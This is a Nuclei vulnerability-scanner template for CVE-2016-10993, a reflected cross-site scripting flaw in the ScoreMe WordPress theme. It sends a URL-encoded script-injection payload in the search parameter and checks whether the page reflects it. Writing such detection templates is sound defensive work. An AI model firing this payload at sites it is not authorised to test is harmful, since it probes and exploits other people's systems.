nuclei-templates/cves/2016/CVE-2016-10993.yaml

38 lines
992 B
YAML
Raw Normal View History

2021-07-31 23:41:54 +00:00
id: CVE-2016-10993
info:
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference:
2021-07-31 23:41:54 +00:00
- https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
2021-08-02 11:46:58 +00:00
tags: cve,cve2016,wordpress,wp-theme,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2016-10993
cwe-id: CWE-79
description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter."
2021-07-31 23:41:54 +00:00
requests:
- method: GET
path:
2021-08-02 11:46:58 +00:00
- "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-31 23:41:54 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-08-02 11:46:58 +00:00
- '</script><script>alert(document.domain)</script>'
2021-07-31 23:41:54 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200